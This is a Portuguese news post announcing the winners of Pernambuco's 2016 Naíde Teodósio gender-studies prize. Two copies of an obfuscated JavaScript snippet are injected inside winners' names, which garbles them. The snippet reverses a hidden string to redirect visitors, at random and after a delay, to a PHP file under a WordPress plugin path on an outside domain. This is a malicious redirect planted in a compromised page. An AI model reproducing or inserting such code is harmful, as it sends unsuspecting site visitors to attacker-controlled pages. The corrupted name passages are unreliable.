Premiados do Prêmio Naíde Teodósio de 2016

Este ano, a Secretaria da Mulher de Pernambuco (SecMulher-PE) premiou 35 vencedores da 9ª Edição do Prêmio Naíde Teodósio de Estudos de Gênero em evento que aconteceu no Teatro Santa Isabel na terça-feira, dia 29 de novembro. A comissão julgadora do prêmio, coordenada pela Gerência de Formação em Gênero da SecMulher-PE, analisou 697 trabalhos inscritos.

Cabele Alberto Mendes Melo, Jackson José dos Santos Lima e Mallyson Matheus Nascimento da Silva estão entre os 10 premiados na modalidade de Redação do Ensino Médio. A menção honrosa, na modalidade Redação Ensino Médio, foi para Nichole Emília de Andrade Alves. Estão entre os nove vencedores da modalidade Redação de Ensino Técnico Subsequente: Thaís Virgínia Gama de Carvalho, Sabrina Maria de Souza Silva e Andréia Tabatchnick Bret.

Na categoria Relatos de Experiência/Professoras(es) do Ensino Médio, os vencedores foram Dayvison Le$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andro dos Santos, Suemys Luize Pansani Tavares e Mirian Aparecida Vieira. Antônio de Lisboa Nunes Gomes ganhou na modalidade Projeto de Experiência / Professoras(es) do Ensino Técnico Subsequente. Laura Maria Ramos Mir$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}anda ganhou o primeiro lugar na modalidade Artigos de Graduação e Francisco Gleidson Vieira dos Santos foi o primeiro lugar na modalidade Artigos Científicos de Pós-Graduação.

Com o título “Pó da Terra”, Ana Carolina Correia, da Universidade Católica de Pernambuco (Unicap) venceu a categoria Roteiro para Vídeo Documentário Digital de Curta Metragem. O Mérito Institucional foi para a Escola de Referência em Ensino Médio Porto Digital, Escola de Aplicação Professor Chaves, Escola de Referência em Ensino Médio de Garanhuns, Escola de Referência em Ensino Médio Oliveira Lima.

Os estudantes receberam R$ 56 mil em prêmios. Entre eles foram entregues: 23 tablets, 4 Auxílios de Viagem a Congresso Nacional, 4 kits culturais, 4 assinaturas da revista Continente  e diplomas.

O prêmio é uma parceria entre Secretaria da Mulher de Pernambuco (SecMulher-PE), Fundação de Amparo à Ciência e Tecnologia de Pernambuco (FACEPE), Secretaria de Educação (SEE),  Secretaria de Ciência, Tecnologia e Inovação (SECTI), Secretaria de Planejamento e Gestão (SEPLAG), Companhia Editora de Pernambuco (CEPE), Fundação do Patrimônio Histórico e Artístico de Pernambuco (FUNDARPE), Fundação Joaquim Nabuco (FUNDAJ) e Instituto Federal de Educação, Ciência e Tecnologia de Pernambuco (IFPE).

Veja a publicação no DOE.